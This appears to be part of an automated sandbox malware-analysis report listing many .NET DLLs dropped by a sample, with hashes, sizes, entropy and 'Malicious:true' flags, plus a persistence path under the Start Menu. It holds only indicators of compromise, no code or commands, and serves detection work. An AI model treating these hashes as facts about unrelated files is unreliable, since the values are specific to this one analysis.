                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
